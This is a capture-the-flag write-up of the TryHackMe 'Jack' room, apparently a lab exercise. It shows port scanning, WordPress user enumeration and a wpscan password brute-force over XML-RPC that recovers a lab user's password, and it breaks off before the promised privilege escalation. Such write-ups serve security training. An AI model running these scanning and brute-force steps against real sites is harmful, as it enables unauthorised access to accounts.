Jack

In today’s Game we are going to explore hacking into a WordPress site to obain a low privileged user access, then find credentials to pivot to a normal user on the box, and then enumerating to find some interesting things with Python which allows us to PrivEsc to Root and own this box.

Initial Enumeration

Get a rust scan:

✘ kali@kalia  ~/curr  rustscan -a $IP
[sudo] password for kali: 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.13.248:22
Open 10.10.13.248:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-11 23:04 UTC
Initiating Ping Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Completed Ping Scan at 23:04, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:04
Completed Parallel DNS resolution of 1 host. at 23:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Discovered open port 22/tcp on 10.10.13.248
Discovered open port 80/tcp on 10.10.13.248
Completed Connect Scan at 23:04, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.13.248
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-11-11 23:04:00 UTC for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds

Looks like this is WordPress v5.3.2.

There is a robots.txt disallowed entry for wp-admin.

Now checking out the website on port 80:

and here is the source for that:

<!doctype html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="[https://gmpg.org/xfn/11](view-source:https://gmpg.org/xfn/11)">

    <title>Jack&#039;s Personal Site &#8211; Blog for Jacks writing adventures.</title>
<link rel='dns-prefetch' href='[//fonts.googleapis.com](view-source:http://fonts.googleapis.com/)' />
<link rel='dns-prefetch' href='[//s.w.org](view-source:http://s.w.org/)' />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Feed" href="[http://jack.thm/index.php/feed/](view-source:http://jack.thm/index.php/feed/)" />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Comments Feed" href="[http://jack.thm/index.php/comments/feed/](view-source:http://jack.thm/index.php/comments/feed/)" />
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/jack.thm\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
            !function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>
        <style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
    <link rel='stylesheet' id='wp-block-library-css'  href='[http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2](view-source:http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2)' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-theme-css'  href='[http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2](view-source:http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2)' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-googleapis-css'  href='[//fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900](view-source:http://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900)' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1)' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2)' type='text/css' media='all' />
<link rel='stylesheet' id='owlcarousel-css-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='lightbox-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-style-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2](view-source:http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2)' type='text/css' media='all' />
<style id='online-portfolio-style-inline-css' type='text/css'>
.example_f , #intro .btn-get-started , .search-button button, a.btn-get-started.scrollto,.section-header h3::after,#faq #accordion .card-header .btn[aria-expanded="true"],#portfolio #portfolio-flters li:hover, #portfolio #portfolio-flters li.filter-active,#call-to-action .cta-btn:hover,.back-to-top{
           background: #e02c2c;}

    h3.entry-title a , #mobile-nav ul li.menu-active a, .footer-top a, .timeline-content a, #facts .counters span, .credits a,.side-bar1 a, a.continue-link, a.btn-get-started.scrollto.know a , .nav-menu li:hover > a, .nav-menu > .menu-active > a,#services .icon i,#services .box:hover .title a,.contact-page-content ul li .fa{

           color: #e02c2c;}
    #testimonials .owl-dot.active,.post-rating, .line > span, .service-icon div, .widget-online-portfolio-theme-counter, .portfolioFilter .current, .portfolioFilter a:hover, .paralex-btn:hover, .view-more:hover, .features-slider .owl-theme .owl-controls .owl-page.active span, .widget-online-portfolio-theme-testimonial .owl-theme .owl-controls .owl-page.active span, .read-more-background, .widget-online-portfolio-theme-testimonial, .widget-online-portfolio-theme-meetbutton, .footer-tags a:hover, .ample-inner-banner, .widget-search .search-submit:hover,  .pagination-blog .pagination > .active > a, .pagination-blog .pagination > li > a:hover, .scrollup, .widget_search .search-submit, posts-navigation .nav-previous, .posts-navigation .nav-next, .wpcf7-form input.wpcf7-submit
 {

           background-color: #e02c2c;}

    #footer .footer-top{
         background-color: #252020;}
    ..icon-box--description .fa{
         border-color: #e02c2c!important;}
    .post-rating,.line > span, .service-icon div, .widget-online-portfolio-theme-counter, .portfolioFilter .current, .portfolioFilter a:hover, .paralex-btn:hover, .view-more:hover, .features-slider .owl-theme .owl-controls .owl-page.active span, .widget-online-portfolio-theme-testimonial .owl-theme .owl-controls .owl-page.active span, .read-more-background, .widget-online-portfolio-theme-testimonial, .widget-online-portfolio-theme-meetbutton, .footer-tags a:hover, .ample-inner-banner,  .widget-search .search-submit:hover,  .pagination-blog .pagination > .active > a, .pagination-blog .pagination > li > a:hover, .scrollup ,.widget_search .search-submit ,posts-navigation .nav-previous,.posts-navigation .nav-next , .wpcf7-form input.wpcf7-submit

 {

           background-color: #e02c2c;}

    .error404 .content-area .search-form .search-submit  ,.button-course, .read-more-background:hover,a.viewcourse , .blog-event-date{
           background: #e02c2c!important;}


</style>
<link rel='stylesheet' id='online-portfolio-block-front-styles-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0](view-source:http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0)' type='text/css' media='all' />
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp](view-source:http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1](view-source:http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0)'></script>
<link rel='https://api.w.org/' href='[http://jack.thm/index.php/wp-json/](view-source:http://jack.thm/index.php/wp-json/)' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="[http://jack.thm/xmlrpc.php?rsd](view-source:http://jack.thm/xmlrpc.php?rsd)" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="[http://jack.thm/wp-includes/wlwmanifest.xml](view-source:http://jack.thm/wp-includes/wlwmanifest.xml)" /> 
<meta name="generator" content="WordPress 5.3.2" />
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style></head>

<body class="home blog at-sticky-sidebar hfeed no-sidebar">

<div id="page" class="site">
    <a class="skip-link screen-reader-text" href="[#content](view-source:http://jack.thm/#content)">
        Skip to content</a>

<!--==========================
  Header
============================-->


<header id="header">
        <div class="main-header">
        <div class="container-fluid">

            <div id="logo" class="pull-left">
                                        <h1 class="site-title">

                            <a href="[http://jack.thm/](view-source:http://jack.thm/)" rel="home">Jack&#039;s Personal Site</a>
                        </h1>
                                            <p class="site-description">Blog for Jacks writing adventures.</p>
                                        <!-- Uncomment below if you prefer to use an image logo -->
                <!-- <a href="#intro"><img src="img/logo.png" alt="" title="" /></a>-->
            </div>

            <nav id="nav-menu-container">


            </nav><!-- #nav-menu-container -->
        </div>

    </div>
</header><!-- #header -->

<main id="main">


    <div class="inner-header-banner overlay bg-img"
         style="background-image: url(http://192.168.1.122/wp-content/uploads/2020/01/cropped-jacktypewriter.jpg);">
        <div class="container">
            <header class="section-header">

            <h3>Latest Blog</h3>



                    <div class="breadcrumbs">
                        <div class="container">
                            <div class="breadcrumb-trail breadcrumbs" arial-label="Breadcrumbs" role="navigation">
                                <ol class="breadcrumb trail-items">
                                    <li><nav role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs" itemprop="breadcrumb"><h2 class="trail-browse">Browse</h2><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="1" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="name">Home</span><meta itemprop="position" content="1" /></li></ul></nav></li>
                                </ol>
                            </div>
                        </div>
                    </div>

            </header>
        </div>
    </div>

        <div id="content" class="site-content single-ample-page">
        <div class="container  clearfix">
                            <div class="row">                   <!-- Start primary content area -->
                    <div id="primary" class="content-area">
                        <main id="main" class="site-main" role="main">


<div class="col-md-12">
    <article id="post-9"
             class="post type-post status-publish has-post-thumbnail hentry" class="post-9 post type-post status-publish format-standard hentry category-uncategorized">

        <a class="post-thumbnail" href="[#](view-source:http://jack.thm/#)" aria-hidden="true" tabindex="-1">
                    </a>

        <header class="entry-header">
            <h3 class="entry-title">
                <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)" rel="bookmark">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
            </h3>
            <div class="entry-meta">
                                            <span class="posted-on">Posted on
<a href="[#](view-source:http://jack.thm/#)" rel="bookmark">
    <time class="entry-date published updated" datetime="2018-11-25T04:36:26+00:00">January 10, 2020</time>
</a>
                                            </span>
                                                <span class="byline"> by
                                                    <span class="author vcard">
                                                    <a class="url fn n"
                                                       href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)">jack</a>
                                                </span>
                                            </span>
            </div><!-- .entry-meta -->
        </header><!-- .entry-header -->

        <div class="entry-content">
            <p>    Due to my recent writer&#8217;s block, I will be taking a bit of time for my family and myself at the Overlook Hotel, don&#8217;t think this will be just a vacation, I assure you, I will be working very hard&hellip;            </p>

            <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)"
               class="continue-link">Continue Reading</a>

        </div><!-- .entry-content -->

    </article>
</div>

                        </main><!-- #main -->
                    </div><!-- #primary -->

                    <div id="sidebar-primary secondary" class="widget-area sidebar" role="complementary">
                        <section  class="widget ">

<aside id="secondary" class="widget-area">
    <div class="side-bar1">
        <section id="search-2" class="widget widget_search"><form action="[http://jack.thm](view-source:http://jack.thm/)" autocomplete="on" class="top-search">
    <input id="search" name="s" value="" type="text" placeholder="Search&hellip;&hellip;">
    <div class="search-button"><button type="submit">Search</button></div>
</form>
</section>        <section id="recent-posts-2" class="widget widget_recent_entries">      <h2 class="widget-title"><span>Recent Posts</span></h2>     <ul>
                                            <li>
                    <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
                                    </li>
                    </ul>
        </section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title"><span>Recent Comments</span></h2><ul id="recentcomments"></ul></section><section id="archives-2" class="widget widget_archive"><h2 class="widget-title"><span>Archives</span></h2>     <ul>
                <li><a href='[http://jack.thm/index.php/2020/01/](view-source:http://jack.thm/index.php/2020/01/)'>January 2020</a></li>
        </ul>
            </section><section id="categories-2" class="widget widget_categories"><h2 class="widget-title"><span>Categories</span></h2>     <ul>
                <li class="cat-item cat-item-1"><a href="[http://jack.thm/index.php/category/uncategorized/](view-source:http://jack.thm/index.php/category/uncategorized/)">Uncategorized</a>
</li>
        </ul>
            </section><section id="meta-2" class="widget widget_meta"><h2 class="widget-title"><span>Meta</span></h2>           <ul>
                        <li><a href="[http://jack.thm/wp-login.php](view-source:http://jack.thm/wp-login.php)">Log in</a></li>
            <li><a href="[http://jack.thm/index.php/feed/](view-source:http://jack.thm/index.php/feed/)">Entries feed</a></li>
            <li><a href="[http://jack.thm/index.php/comments/feed/](view-source:http://jack.thm/index.php/comments/feed/)">Comments feed</a></li>
            <li><a href="[https://wordpress.org/](view-source:https://wordpress.org/)">WordPress.org</a></li>           </ul>
            </section>  </div>
</aside><!-- #secondary -->
                        </section>
                    </div>

                </div>
            </div>
        </div>
</main>

    <footer id="footer">



        <div class="container">
            <div class="copyright">
                &copy; Copyright All Rights Reserved 2019           </div>
            <div class="credits">
                <a href="[https://www.amplethemes.com/](view-source:https://www.amplethemes.com/)"
                > Design &amp; develop by AmpleThemes </a>
            </div>
        </div>
    </footer><!-- #footer -->

    <a href="[#](view-source:http://jack.thm/#)" class="back-to-top"><i class="fas fa-chevron-up"></i></a>
    <script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1](view-source:http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2](view-source:http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2)'></script>
</div>

    </body>
    </html>

Now further enumerating the wordpress site. I see a possible username ‘jack’ as the owner of this post.

Let me get a wpscan going.

 ✘ kali@kalia  ~/curr  wpscan -e u,ap --url http://jack.thm                                                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 08:30:35 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <==============================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 08:30:55 2023
[+] Requests Done: 59
[+] Cached Requests: 9
[+] Data Sent: 14.86 KB
[+] Data Received: 371.931 KB
[+] Memory used: 242.645 MB
[+] Elapsed time: 00:00:20

I see it found a few interesting things.

I made a users.txt file with the 3 users and then run a brute-force password scan on those 3:

 kali@kalia  ~/curr  wpscan --url http://jack.thm/ -t 3 -U users.txt --passwords toplikeymunged.txt     
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 09:42:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:14 <=============================================> (137 / 137) 100.00% Time: 00:00:14

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                                                             
Trying danny / starwars Time: 00:02:06 <====================================             > (645 / 867) 74.39%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: wendy, Password: changelater

